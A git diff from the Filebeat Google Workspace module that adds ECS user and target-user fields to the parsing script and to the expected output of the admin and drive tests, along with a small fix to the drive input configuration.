a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json @@ -51,7 +51,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -105,7 +108,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -159,7 +165,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -211,7 +220,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -260,6 +272,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json index a04a9e8490b4..0d31e53291c6 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +105,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -152,7 +164,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -204,7 +222,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -255,7 +279,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -306,7 +336,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -357,7 +393,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -408,7 +450,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -460,7 +508,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -512,7 +566,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -563,7 +623,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -615,7 +678,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -667,7 +736,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -721,7 +796,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -774,7 +855,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -827,7 +914,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -880,7 +973,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -933,7 +1032,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -986,7 +1091,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1039,7 +1150,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1092,7 +1209,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1145,7 +1268,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1198,7 +1327,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1249,7 +1384,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1300,7 +1441,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1353,7 +1500,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1406,7 +1559,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1465,7 +1624,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1518,7 +1683,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1570,7 +1741,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1622,7 +1799,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1674,7 +1857,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1726,7 +1915,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1779,7 +1974,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1831,7 +2032,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1884,7 +2091,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1936,7 +2149,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1988,7 +2207,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2040,7 +2265,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2092,7 +2323,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2143,7 +2380,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2196,7 +2439,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2244,7 +2493,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2295,7 +2547,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2346,7 +2604,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2397,7 +2661,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2454,7 +2724,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2506,7 +2782,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2557,7 +2839,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2608,7 +2896,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2659,7 +2953,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2711,7 +3011,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2763,7 +3069,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2814,7 +3126,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2865,7 +3183,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2916,7 +3240,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2967,7 +3297,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3019,7 +3355,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3070,7 +3412,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3121,7 +3469,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3172,7 +3526,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3223,7 +3583,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3271,7 +3637,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3324,7 +3693,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3376,7 +3751,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3428,7 +3809,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3479,7 +3866,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3530,7 +3923,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3581,7 +3980,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3632,7 +4037,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3683,7 +4094,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3734,7 +4151,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3784,7 +4207,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3835,6 +4261,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/config/common.js b/x-pack/filebeat/module/google_workspace/config/common.js index a031e4e26aa6..d918512df4ee 100644 --- a/x-pack/filebeat/module/google_workspace/config/common.js +++ b/x-pack/filebeat/module/google_workspace/config/common.js @@ -50,7 +50,10 @@ var googleWorkspace = (function () { return; } + evt.Put("user.id", evt.Get("source.user.id")); + evt.Put("user.name", data[0]); evt.Put("source.user.name", data[0]); + evt.Put("user.domain", data[1]); evt.Put("source.user.domain", data[1]); }; diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index b2ba9bf7458b..18eacfef7a20 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -15,11 +15,11 @@ request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' response.split: target: body.items split: - target: events + target: body.events keep_parent: true response.pagination: - set: @@ -45,7 +45,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json index 7577f101f35f..2cf11698199b 100644 --- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json @@ -59,7 +59,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -121,7 +124,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -183,7 +189,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -245,7 +254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -307,7 +319,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -367,7 +382,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -427,7 +445,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -487,7 +508,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -547,7 +571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -607,7 +634,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -671,7 +701,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -731,7 +764,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -791,7 +827,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -853,7 +892,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -915,7 +957,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -975,7 +1020,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1035,7 +1083,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1095,7 +1146,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1155,7 +1209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1215,7 +1272,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1276,7 +1336,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1342,7 +1405,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1409,7 +1475,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1476,7 +1545,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1543,7 +1615,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1610,7 